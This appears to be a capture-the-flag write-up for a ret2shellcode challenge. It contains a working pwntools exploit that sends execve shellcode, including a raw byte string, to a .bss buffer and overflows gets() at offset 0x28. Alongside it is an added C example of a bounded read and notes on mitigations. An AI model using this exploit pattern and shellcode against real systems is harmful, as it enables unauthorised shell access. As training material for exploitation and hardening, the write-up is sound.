Checksec:
No protections enabled.
IDA:
The read function first writes our input into the .bss segment, then calls gets() again, which overflows; offset = 0x28.
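For contrast, here is the defensive side of the bug just described: a fixed-size global buffer filled by an unbounded gets() call, beside a bounded replacement that cannot run past the buffer. This is an added example, not code from the challenge binary or the write-up; the buffer size NAME_LEN and the function names are assumptions, since the write-up only gives the return-address offset (0x28) and the buffer address (0x601080).

```c
#include <stdio.h>
#include <string.h>

/* Assumed size of the .bss name buffer; the write-up only gives the
 * 0x28 return-address offset and the buffer address 0x601080, so
 * NAME_LEN is a placeholder, not a value taken from the binary. */
#define NAME_LEN 0x20

/* Global (.bss) buffer, as in the challenge: its address is fixed when
 * PIE is off, and with NX off its contents can later be executed. */
char name_bss[NAME_LEN];

/* Bounded replacement for gets(): copies at most dstlen-1 bytes of one
 * line from src, stops at '\n', always NUL-terminates dst and reports
 * whether the input was cut short. Returns the number of bytes stored. */
size_t read_line_bounded(char *dst, size_t dstlen, const char *src, int *truncated)
{
    size_t n = 0;
    *truncated = 0;
    if (dstlen == 0)
        return 0;
    while (src[n] != '\0' && src[n] != '\n') {
        if (n == dstlen - 1) {      /* out of room: stop instead of overflowing */
            *truncated = 1;
            break;
        }
        dst[n] = src[n];
        n++;
    }
    dst[n] = '\0';
    return n;
}

/* Hardened version of the challenge's read routine (hypothetical name):
 * same destination, same behaviour for in-range input, but an oversized
 * line can no longer run past name_bss. Returns 1 if it was truncated. */
int read_name(const char *input)
{
    int truncated;
    read_line_bounded(name_bss, sizeof name_bss, input, &truncated);
    return truncated;
}

/* Mirrors the overflow condition behind the bug: gets() into a
 * buflen-byte buffer overflows as soon as the line plus its terminating
 * NUL exceeds buflen. Returns 1 if the line fits, 0 if it would overflow. */
int line_fits(const char *line, size_t buflen)
{
    size_t len = strcspn(line, "\n");
    return len + 1 <= buflen;
}

int main(void)
{
    /* Constructed inputs: one short name, and one line of 0x28 + 8
     * bytes, the size of the padding plus return address in the write-up. */
    const char *ok = "alice\n";
    char big[0x28 + 8 + 2];
    memset(big, 'a', sizeof big - 2);
    big[sizeof big - 2] = '\n';
    big[sizeof big - 1] = '\0';

    int fits = line_fits(ok, NAME_LEN);
    int cut = read_name(ok);
    printf("short line fits: %d, truncated: %d -> \"%s\"\n", fits, cut, name_bss);

    fits = line_fits(big, NAME_LEN);
    cut = read_name(big);
    printf("0x30-byte line fits: %d, truncated: %d, stored %zu bytes\n",
           fits, cut, strlen(name_bss));
    return 0;
}
```

With the bounded read in place the 0x28 offset becomes unreachable; independently of the code fix, enabling NX would make the .bss copy of the shellcode non-executable, and a stack canary would abort the process before the overwritten return address is used, which is why the write-up's first step is the checksec result.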
So this is a textbook ret2shellcode:
Construct the exploit:

from pwn import *

context(arch="amd64", os='linux', log_level='debug', terminal=['tmux', 'sp', '-h'])
r = remote("node4.buuoj.cn", 29164)

# Shellcode that will be stored in .bss by the first read (the "name" prompt).
shell = asm(shellcraft.sh())
# Hand-written execve("/bin/sh") shellcode equivalent to the above; kept for reference, not sent.
shell1 = b"\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"

shell_addr = 0x601080                      # .bss address where the name is stored (no PIE)
payload = b"a" * 0x28 + p64(shell_addr)    # 0x28 bytes of padding up to the saved return address

r.recvuntil(b"name")
r.sendline(shell)
r.recvuntil(b"me?")
r.sendline(payload)
r.interactive()
Flag: